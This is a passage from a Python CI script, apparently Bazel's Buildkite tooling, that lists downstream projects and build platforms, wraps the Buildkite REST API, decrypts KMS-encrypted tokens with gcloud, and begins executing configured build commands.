"Gerrit": {
"git_repository": "https://gerrit.googlesource.com/gerrit.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/gerrit-postsubmit.yml",
"pipeline_slug": "gerrit",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1182",
},
"Google Logging": {
"git_repository": "https://github.com/google/glog.git",
"http_config": "https://raw.githubusercontent.com/google/glog/master/.bazelci/presubmit.yml",
"pipeline_slug": "google-logging",
},
"IntelliJ Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/intellij.yml",
"pipeline_slug": "intellij-plugin",
},
"IntelliJ Plugin Aspect": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/aspect.yml",
"pipeline_slug": "intellij-plugin-aspect",
},
"Kythe": {
"git_repository": "https://github.com/kythe/kythe.git",
"http_config": "https://raw.githubusercontent.com/kythe/kythe/master/.bazelci/presubmit.yml",
"pipeline_slug": "kythe",
},
"Protobuf": {
"git_repository": "https://github.com/google/protobuf.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/protobuf-postsubmit.yml",
"pipeline_slug": "protobuf",
"owned_by_bazel": True,
},
"Stardoc": {
"git_repository": "https://github.com/bazelbuild/stardoc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/stardoc/master/.bazelci/presubmit.yml",
"pipeline_slug": "stardoc",
"owned_by_bazel": True,
},
"Subpar": {
"git_repository": "https://github.com/google/subpar.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/subpar-postsubmit.yml",
"pipeline_slug": "subpar",
"owned_by_bazel": True,
"disabled_reason": "https://github.com/google/subpar/issues/133",
},
"TensorFlow": {
"git_repository": "https://github.com/tensorflow/tensorflow.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/tensorflow-postsubmit.yml",
"pipeline_slug": "tensorflow",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Tulsi": {
"git_repository": "https://github.com/bazelbuild/tulsi.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/tulsi/master/.bazelci/presubmit.yml",
"pipeline_slug": "tulsi-bazel-darwin",
},
"re2": {
"git_repository": "https://github.com/google/re2.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/re2-postsubmit.yml",
"pipeline_slug": "re2",
},
"rules_android": {
"git_repository": "https://github.com/bazelbuild/rules_android.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_android/master/.bazelci/postsubmit.yml",
"pipeline_slug": "rules-android",
"disabled_reason": "https://github.com/bazelbuild/rules_android/issues/15",
},
"rules_appengine": {
"git_repository": "https://github.com/bazelbuild/rules_appengine.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_appengine/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-appengine-appengine",
},
"rules_apple": {
"git_repository": "https://github.com/bazelbuild/rules_apple.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_apple/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-apple-darwin",
},
"rules_cc": {
"git_repository": "https://github.com/bazelbuild/rules_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_cc/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-cc",
"owned_by_bazel": True,
},
"rules_closure": {
"git_repository": "https://github.com/bazelbuild/rules_closure.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_closure/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-closure-closure-compiler",
"owned_by_bazel": True,
},
"rules_d": {
"git_repository": "https://github.com/bazelbuild/rules_d.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_d/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-d",
},
"rules_docker": {
"git_repository": "https://github.com/bazelbuild/rules_docker.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_docker/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-docker-docker",
},
"rules_dotnet": {
"git_repository": "https://github.com/bazelbuild/rules_dotnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_dotnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-dotnet-edge",
},
"rules_foreign_cc": {
"git_repository": "https://github.com/bazelbuild/rules_foreign_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_foreign_cc/main/.bazelci/config.yaml",
"pipeline_slug": "rules-foreign-cc",
"owned_by_bazel": True,
},
"rules_go": {
"git_repository": "https://github.com/bazelbuild/rules_go.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_go/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-go-golang",
},
"rules_groovy": {
"git_repository": "https://github.com/bazelbuild/rules_groovy.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_groovy/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-groovy",
},
"rules_gwt": {
"git_repository": "https://github.com/bazelbuild/rules_gwt.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_gwt/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-gwt",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1202",
},
"rules_haskell": {
"git_repository": "https://github.com/tweag/rules_haskell.git",
"http_config": "https://raw.githubusercontent.com/tweag/rules_haskell/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-haskell-haskell",
},
"rules_jsonnet": {
"git_repository": "https://github.com/bazelbuild/rules_jsonnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jsonnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jsonnet",
},
"rules_jvm_external": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jvm-external",
"owned_by_bazel": True,
},
"rules_jvm_external - examples": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/examples.yml",
"pipeline_slug": "rules-jvm-external-examples",
"owned_by_bazel": True,
},
"rules_k8s": {
"git_repository": "https://github.com/bazelbuild/rules_k8s.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_k8s/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-k8s-k8s",
},
"rules_kotlin": {
"git_repository": "https://github.com/bazelbuild/rules_kotlin.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_kotlin/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-kotlin-kotlin",
},
"rules_nodejs": {
"git_repository": "https://github.com/bazelbuild/rules_nodejs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_nodejs/stable/.bazelci/presubmit.yml",
"pipeline_slug": "rules-nodejs-nodejs",
},
"rules_perl": {
"git_repository": "https://github.com/bazelbuild/rules_perl.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_perl/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-perl",
},
"rules_proto": {
"git_repository": "https://github.com/bazelbuild/rules_proto.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_proto/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-proto",
"owned_by_bazel": True,
},
"rules_python": {
"git_repository": "https://github.com/bazelbuild/rules_python.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_python/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-python-python",
"owned_by_bazel": True,
},
"rules_rust": {
"git_repository": "https://github.com/bazelbuild/rules_rust.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_rust/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-rust-rustlang",
},
"rules_sass": {
"git_repository": "https://github.com/bazelbuild/rules_sass.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_sass/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-sass",
},
"rules_scala": {
"git_repository": "https://github.com/bazelbuild/rules_scala.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_scala/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-scala-scala",
"disabled_reason": "https://github.com/bazelbuild/rules_scala/issues/1224",
},
"rules_swift": {
"git_repository": "https://github.com/bazelbuild/rules_swift.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_swift/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-swift-swift",
"do_not_notify": "https://github.com/bazelbuild/continuous-integration/issues/915",
},
"rules_webtesting": {
"git_repository": "https://github.com/bazelbuild/rules_webtesting.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_webtesting/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-webtesting-saucelabs",
},
"upb": {
"git_repository": "https://github.com/protocolbuffers/upb.git",
"http_config": "https://raw.githubusercontent.com/protocolbuffers/upb/master/.bazelci/presubmit.yml",
"pipeline_slug": "upb",
},
}
DOWNSTREAM_PROJECTS_TESTING = {
"Bazel": DOWNSTREAM_PROJECTS_PRODUCTION["Bazel"],
"Bazelisk": DOWNSTREAM_PROJECTS_PRODUCTION["Bazelisk"],
"Federation": {
"git_repository": "https://github.com/fweikert/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/fweikert/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
},
"rules_docker": DOWNSTREAM_PROJECTS_PRODUCTION["rules_docker"],
"rules_go": DOWNSTREAM_PROJECTS_PRODUCTION["rules_go"],
"rules_groovy": DOWNSTREAM_PROJECTS_PRODUCTION["rules_groovy"],
"rules_kotlin": DOWNSTREAM_PROJECTS_PRODUCTION["rules_kotlin"],
"rules_nodejs": DOWNSTREAM_PROJECTS_PRODUCTION["rules_nodejs"],
"rules_rust": DOWNSTREAM_PROJECTS_PRODUCTION["rules_rust"],
"rules_scala": DOWNSTREAM_PROJECTS_PRODUCTION["rules_scala"],
}
DOWNSTREAM_PROJECTS = {
"bazel-testing": DOWNSTREAM_PROJECTS_TESTING,
"bazel-trusted": {},
"bazel": DOWNSTREAM_PROJECTS_PRODUCTION,
}[BUILDKITE_ORG]
DOCKER_REGISTRY_PREFIX = {
"bazel-testing": "bazel-public/testing",
"bazel-trusted": "bazel-public",
"bazel": "bazel-public",
}[BUILDKITE_ORG]
# A map containing all supported platform names as keys, with the values being
# the platform name in a human readable format, and a the buildkite-agent's
# working directory.
PLATFORMS = {
"centos7": {
"name": "CentOS 7, Java 8",
"emoji-name": ":centos: 7 (Java 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1404", "centos7", "linux"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java8",
"python": "python3.6",
},
"debian10": {
"name": "Debian Buster, OpenJDK 11",
"emoji-name": ":debian: Buster (OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/debian10-java11",
"python": "python3.7",
},
"ubuntu1604": {
"name": "Ubuntu 16.04, OpenJDK 8",
"emoji-name": ":ubuntu: 16.04 (OpenJDK 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1604"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
"ubuntu1804": {
"name": "Ubuntu 18.04, OpenJDK 11",
"emoji-name": ":ubuntu: 18.04 (OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1804"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1804-java11",
"python": "python3.6",
},
"ubuntu2004": {
"name": "Ubuntu 20.04, OpenJDK 11",
"emoji-name": ":ubuntu: 20.04 (OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11",
"python": "python3.8",
},
"kythe_ubuntu2004": {
"name": "Kythe (Ubuntu 20.04, OpenJDK 11)",
"emoji-name": "Kythe (:ubuntu: 20.04, OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11-kythe",
"python": "python3.8",
},
"macos": {
"name": "macOS, OpenJDK 8",
"emoji-name": ":darwin: (OpenJDK 8)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos"],
"queue": "macos",
"python": "python3",
},
"macos_arm64": {
"name": "macOS (arm64), OpenJDK 8",
"emoji-name": ":darwin: (arm64) (OpenJDK 8)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos_arm64"],
# TODO(pcloudy): Switch to macos_arm64 queue when Apple Silicon machines are available,
# current we just use x86_64 machines to do cross compile.
"queue": "macos",
"python": "python3",
},
"windows": {
"name": "Windows, OpenJDK 8",
"emoji-name": ":windows: (OpenJDK 8)",
"downstream-root": "c:/b/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["windows"],
"queue": "windows",
"python": "python.exe",
},
"rbe_ubuntu1604": {
"name": "RBE (Ubuntu 16.04, OpenJDK 8)",
"emoji-name": "RBE (:ubuntu: 16.04, OpenJDK 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
}
BUILDIFIER_DOCKER_IMAGE = "gcr.io/bazel-public/buildifier"
# The platform used for various steps (e.g. stuff that formerly ran on the "pipeline" workers).
DEFAULT_PLATFORM = "ubuntu1804"
# In order to test that "the one Linux binary" that we build for our official releases actually
# works on all Linux distributions that we test on, we use the Linux binary built on our official
# release platform for all Linux downstream tests.
LINUX_BINARY_PLATFORM = "centos7"
DEFAULT_XCODE_VERSION = "12.4"
XCODE_VERSION_REGEX = re.compile(r"^\d+\.\d+(\.\d+)?$")
XCODE_VERSION_OVERRIDES = {"10.2.1": "10.3", "11.2": "11.2.1", "11.3": "11.3.1"}
ENCRYPTED_SAUCELABS_TOKEN = """
CiQAry63sOlZtTNtuOT5DAOLkum0rGof+DOweppZY1aOWbat8zwSTQAL7Hu+rgHSOr6P4S1cu4YG
/I1BHsWaOANqUgFt6ip9/CUGGJ1qggsPGXPrmhSbSPqNAIAkpxYzabQ3mfSIObxeBmhKg2dlILA/
EDql
""".strip()
BUILD_LABEL_PATTERN = re.compile(r"^Build label: (\S+)$", re.MULTILINE)
BUILDIFIER_VERSION_ENV_VAR = "BUILDIFIER_VERSION"
BUILDIFIER_WARNINGS_ENV_VAR = "BUILDIFIER_WARNINGS"
BUILDIFIER_STEP_NAME = "Buildifier"
SKIP_TASKS_ENV_VAR = "CI_SKIP_TASKS"
CONFIG_FILE_EXTENSIONS = {".yml", ".yaml"}
KYTHE_DIR = "/usr/local/kythe"
INDEX_UPLOAD_POLICY_ALWAYS = "Always"
INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS = "IfBuildSuccess"
INDEX_UPLOAD_POLICY_NEVER = "Never"
class BuildkiteException(Exception):
"""
Raised whenever something goes wrong and we should exit with an error.
"""
pass
class BinaryUploadRaceException(Exception):
"""
Raised when try_publish_binaries wasn't able to publish a set of binaries,
because the generation of the current file didn't match the expected value.
"""
pass
class BuildkiteClient(object):
_ENCRYPTED_BUILDKITE_API_TOKEN = """
CiQA4DEB9ldzC+E39KomywtqXfaQ86hhulgeDsicds2BuvbCYzsSUAAqwcvXZPh9IMWlwWh94J2F
exosKKaWB0tSRJiPKnv2NPDfEqGul0ZwVjtWeASpugwxxKeLhFhPMcgHMPfndH6j2GEIY6nkKRbP
uwoRMCwe
""".strip()
_ENCRYPTED_BUILDKITE_API_TESTING_TOKEN = """
CiQAMTBkWjL1C+F5oon3+cC1vmum5+c1y5+96WQY44p0Lxd0PeASUQAy7iU0c6E3W5EOSFYfD5fA
MWy/SHaMno1NQSUa4xDOl5yc2kizrtxPPVkX4x9pLNuGUY/xwAn2n1DdiUdWZNWlY1bX2C4ex65e
P9w8kNhEbw==
""".strip()
_BUILD_STATUS_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}"
)
_NEW_BUILD_URL_TEMPLATE = "https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds"
_RETRY_JOB_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}/jobs/{}/retry"
)
def __init__(self, org, pipeline):
self._org = org
self._pipeline = pipeline
self._token = self._get_buildkite_token()
def _get_buildkite_token(self):
return decrypt_token(
encrypted_token=self._ENCRYPTED_BUILDKITE_API_TESTING_TOKEN
if THIS_IS_TESTING
else self._ENCRYPTED_BUILDKITE_API_TOKEN,
kms_key="buildkite-testing-api-token"
if THIS_IS_TESTING
else "buildkite-untrusted-api-token",
)
def _open_url(self, url, params=[]):
try:
params_str = "".join("&{}={}".format(k, v) for k, v in params)
return (
urllib.request.urlopen("{}?access_token={}{}".format(url, self._token, params_str))
.read()
.decode("utf-8", "ignore")
)
except urllib.error.HTTPError as ex:
raise BuildkiteException("Failed to open {}: {} - {}".format(url, ex.code, ex.reason))
def get_build_info(self, build_number):
"""Get build info for a pipeline with a given build number
See https://buildkite.com/docs/apis/rest-api/builds#get-a-build
Parameters
----------
build_number : the build number
Returns
-------
dict
the metadata for the build
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, build_number)
output = self._open_url(url)
return json.loads(output)
def get_build_info_list(self, params):
"""Get a list of build infos for this pipeline
See https://buildkite.com/docs/apis/rest-api/builds#list-builds-for-a-pipeline
Parameters
----------
params : the parameters to filter the result
Returns
-------
list of dict
the metadata for a list of builds
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, "")
output = self._open_url(url, params)
return json.loads(output)
def get_build_log(self, job):
return self._open_url(job["raw_log_url"])
@staticmethod
def _check_response(response, expected_status_code):
if response.status_code != expected_status_code:
eprint("Exit code:", response.status_code)
eprint("Response:\n", response.text)
response.raise_for_status()
def trigger_new_build(self, commit, message=None, env={}):
"""Trigger a new build at a given commit and return the build metadata.
See https://buildkite.com/docs/apis/rest-api/builds#create-a-build
Parameters
----------
commit : the commit we want to build at
message : the message we should as the build titile
env : (optional) the environment variables to set
Returns
-------
dict
the metadata for the build
"""
url = self._NEW_BUILD_URL_TEMPLATE.format(self._org, self._pipeline)
data = {
"commit": commit,
"branch": "master",
"message": message if message else f"Trigger build at {commit}",
"env": env,
}
response = requests.post(url + "?access_token=" + self._token, json=data)
BuildkiteClient._check_response(response, requests.codes.created)
return json.loads(response.text)
def trigger_job_retry(self, build_number, job_id):
"""Trigger a job retry and return the job metadata.
See https://buildkite.com/docs/apis/rest-api/jobs#retry-a-job
Parameters
----------
build_number : the number of the build we want to retry
job_id : the id of the job we want to retry
Returns
-------
dict
the metadata for the job
"""
url = self._RETRY_JOB_URL_TEMPLATE.format(self._org, self._pipeline, build_number, job_id)
response = requests.put(url + "?access_token=" + self._token)
BuildkiteClient._check_response(response, requests.codes.ok)
return json.loads(response.text)
def wait_job_to_finish(self, build_number, job_id, interval_time=30, logger=None):
"""Wait a job to finish and return the job metadata
Parameters
----------
build_number : the number of the build we want to wait
job_id : the id of the job we want to wait
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the job
"""
t = 0
build_info = self.get_build_info(build_number)
while True:
for job in build_info["jobs"]:
if job["id"] == job_id:
state = job["state"]
if state != "scheduled" and state != "running" and state != "assigned":
return job
break
else:
raise BuildkiteException(
f"job id {job_id} doesn't exist in build " + build_info["web_url"]
)
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
def wait_build_to_finish(self, build_number, interval_time=30, logger=None):
"""Wait a build to finish and return the build metadata
Parameters
----------
build_number : the number of the build we want to wait
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the build
"""
t = 0
build_info = self.get_build_info(build_number)
while build_info["state"] == "scheduled" or build_info["state"] == "running":
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
return build_info
def decrypt_token(encrypted_token, kms_key):
return (
subprocess.check_output(
[
gcloud_command(),
"kms",
"decrypt",
"--project",
"bazel-untrusted",
"--location",
"global",
"--keyring",
"buildkite",
"--key",
kms_key,
"--ciphertext-file",
"-",
"--plaintext-file",
"-",
],
input=base64.b64decode(encrypted_token),
env=os.environ,
)
.decode("utf-8")
.strip()
)
def eprint(*args, **kwargs):
"""
Print to stderr and flush (just in case).
"""
print(*args, flush=True, file=sys.stderr, **kwargs)
def is_windows():
return os.name == "nt"
def gsutil_command():
return "gsutil.cmd" if is_windows() else "gsutil"
def gcloud_command():
return "gcloud.cmd" if is_windows() else "gcloud"
def downstream_projects_root(platform):
downstream_root = os.path.expandvars(PLATFORMS[platform]["downstream-root"])
if platform == "windows" and os.path.exists("d:/b"):
# If this is a Windows machine with a local SSD, the build directory is
# on drive D.
downstream_root = downstream_root.replace("c:/b/", "d:/b/")
if not os.path.exists(downstream_root):
os.makedirs(downstream_root)
return downstream_root
def fetch_configs(http_url, file_config):
"""
If specified fetches the build configuration from file_config or http_url, else tries to
read it from .bazelci/presubmit.yml.
Returns the json configuration as a python data structure.
"""
if file_config is not None and http_url is not None:
raise BuildkiteException("file_config and http_url cannot be set at the same time")
return load_config(http_url, file_config)
def load_config(http_url, file_config, allow_imports=True):
if http_url:
config = load_remote_yaml_file(http_url)
else:
file_config = file_config or ".bazelci/presubmit.yml"
with open(file_config, "r") as fd:
config = yaml.safe_load(fd)
# Legacy mode means that there is exactly one task per platform (e.g. ubuntu1604_nojdk),
# which means that we can get away with using the platform name as task ID.
# No other updates are needed since get_platform_for_task() falls back to using the
# task ID as platform if there is no explicit "platforms" field.
if "platforms" in config:
config["tasks"] = config.pop("platforms")
if "tasks" not in config:
config["tasks"] = {}
imports = config.pop("imports", None)
if imports:
if not allow_imports:
raise BuildkiteException("Nested imports are not allowed")
for i in imports:
imported_tasks = load_imported_tasks(i, http_url, file_config)
config["tasks"].update(imported_tasks)
return config
def load_remote_yaml_file(http_url):
with urllib.request.urlopen(http_url) as resp:
reader = codecs.getreader("utf-8")
return yaml.safe_load(reader(resp))
def load_imported_tasks(import_name, http_url, file_config):
if "/" in import_name:
raise BuildkiteException("Invalid import '%s'" % import_name)
old_path = http_url or file_config
new_path = "%s%s" % (old_path[: old_path.rfind("/") + 1], import_name)
if http_url:
http_url = new_path
else:
file_config = new_path
imported_config = load_config(http_url=http_url, file_config=file_config, allow_imports=False)
namespace = import_name.partition(".")[0]
tasks = {}
for task_name, task_config in imported_config["tasks"].items():
fix_imported_task_platform(task_name, task_config)
fix_imported_task_name(namespace, task_config)
fix_imported_task_working_directory(namespace, task_config)
tasks["%s_%s" % (namespace, task_name)] = task_config
return tasks
def fix_imported_task_platform(task_name, task_config):
if "platform" not in task_config:
task_config["platform"] = task_name
def fix_imported_task_name(namespace, task_config):
old_name = task_config.get("name")
task_config["name"] = "%s (%s)" % (namespace, old_name) if old_name else namespace
def fix_imported_task_working_directory(namespace, task_config):
old_dir = task_config.get("working_directory")
task_config["working_directory"] = os.path.join(namespace, old_dir) if old_dir else namespace
def print_collapsed_group(name):
eprint("\n\n--- {0}\n\n".format(name))
def print_expanded_group(name):
eprint("\n\n+++ {0}\n\n".format(name))
def use_bazelisk_migrate():
"""
If USE_BAZELISK_MIGRATE is set, we use `bazelisk --migrate` to test incompatible flags.
"""
return bool(os.environ.get("USE_BAZELISK_MIGRATE"))
def bazelisk_flags():
return ["--migrate"] if use_bazelisk_migrate() else []
def calculate_flags(task_config, task_config_key, action_key, tmpdir, test_env_vars):
include_json_profile = task_config.get("include_json_profile", [])
capture_corrupted_outputs = task_config.get("capture_corrupted_outputs", [])
json_profile_flags = []
json_profile_out = None
if action_key in include_json_profile:
json_profile_out = os.path.join(tmpdir, "{}.profile.gz".format(action_key))
json_profile_flags = get_json_profile_flags(json_profile_out)
capture_corrupted_outputs_flags = []
capture_corrupted_outputs_dir = None
if action_key in capture_corrupted_outputs:
capture_corrupted_outputs_dir = os.path.join(
tmpdir, "{}_corrupted_outputs".format(action_key)
)
capture_corrupted_outputs_flags = [
"--experimental_remote_capture_corrupted_outputs={}".format(
capture_corrupted_outputs_dir
)
]
flags = task_config.get(task_config_key) or []
flags += json_profile_flags
flags += capture_corrupted_outputs_flags
# We have to add --test_env flags to `build`, too, otherwise Bazel
# discards its analysis cache between `build` and `test`.
if test_env_vars:
flags += ["--test_env={}".format(v) for v in test_env_vars]
return flags, json_profile_out, capture_corrupted_outputs_dir
def execute_commands(
task_config,
platform,
git_repository,
git_commit,
repo_location,
use_bazel_at_commit,
use_but,
save_but,
needs_clean,
build_only,
test_only,
monitor_flaky_tests,
incompatible_flags,
bazel_version=None,
):
# If we want to test incompatible flags, we ignore bazel_version and always use
# the latest Bazel version through Bazelisk.
if incompatible_flags:
bazel_version = None
if not bazel_version:
# The last good version of Bazel can be specified in an emergency file.
# However, we only use last_good_bazel for pipelines that do not
# explicitly specify a version of Bazel.
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
bazel_version = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError:
# Ignore this error. The Setup step will have already complained about
# it by showing an error message.
pass
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
if use_bazel_at_commit and use_but:
raise BuildkiteException("use_bazel_at_commit cannot be set when use_but is true")
tmpdir = tempfile.mkdtemp()
sc_process = None
try:
if platform == "macos" or platform == "macos_arm64":
activate_xcode(task_config)
# If the CI worker runs Bazelisk, we need to forward all required env variables to the test.
# Otherwise any integration test that invokes Bazel (=Bazelisk in this case) will fail.
test_env_vars = ["LocalAppData"] if platform == "windows" else ["HOME"]
# CI should have its own user agent so that we can remove it from Bazel download statistics.
os.environ["BAZELISK_USER_AGENT"] = "Bazelisk/BazelCI"
test_env_vars.append("BAZELISK_USER_AGENT")
if repo_location:
os.chdir(repo_location)
elif git_repository:
clone_git_repository(git_repository, platform, git_commit)
# We use one binary for all Linux platforms (because we also just release one binary for all
# Linux versions and we have to ensure that it works on all of them).
binary_platform = platform if platform in ["macos", "windows"] else LINUX_BINARY_PLATFORM
if use_bazel_at_commit:
print_collapsed_group(":gcloud: Downloading Bazel built at " + use_bazel_at_commit)
bazel_binary = download_bazel_binary_at_commit(
tmpdir, binary_platform, use_bazel_at_commit
)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
elif use_but:
print_collapsed_group(":gcloud: Downloading Bazel Under Test")
bazel_binary = download_bazel_binary(tmpdir, binary_platform)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
else:
bazel_binary = "bazel"
if bazel_version:
os.environ["USE_BAZEL_VERSION"] = bazel_version
if "USE_BAZEL_VERSION" in os.environ and not task_config.get(
"skip_use_bazel_version_for_test", False
):
# This will only work if the bazel binary in $PATH is actually a bazelisk binary
# (https://github.com/bazelbuild/bazelisk).
test_env_vars.append("USE_BAZEL_VERSION")
for key, value in task_config.get("environment", {}).items():
# We have to explicitly convert the value to a string, because sometimes YAML tries to
# be smart and converts strings like "true" and "false" to booleans.
os.environ[key] = os.path.expandvars(str(value))
# Set BAZELISK_SHUTDOWN to 1 when we use bazelisk --migrate on Windows.
# This is a workaround for https://github.com/bazelbuild/continuous-integration/issues/1012
if use_bazelisk_migrate() and platform == "windows":
os.environ["BAZELISK_SHUTDOWN"] = "1"
cmd_exec_func = execute_batch_commands if platform == "windows" else execute_shell_commands
cmd_exec_func(task_config.get("setup", None))
# Allow the config to override the current working directory.
required_prefix = os.getcwd()
requested_working_dir = os.path.abspath(task_config.get("working_directory", ""))
if os.path.commonpath([required_prefix, requested_working_dir]) != required_prefix:
raise BuildkiteException("working_directory refers to a path outside the workspace")
os.chdir(requested_working_dir)
if platform == "windows":
execute_batch_commands(task_config.get("batch_commands", None))
else:
execute_shell_commands(task_config.get("shell_commands", None))
bazel_version = print_bazel_version_info(bazel_binary, platform)
print_environment_variables_info()
if incompatible_flags:
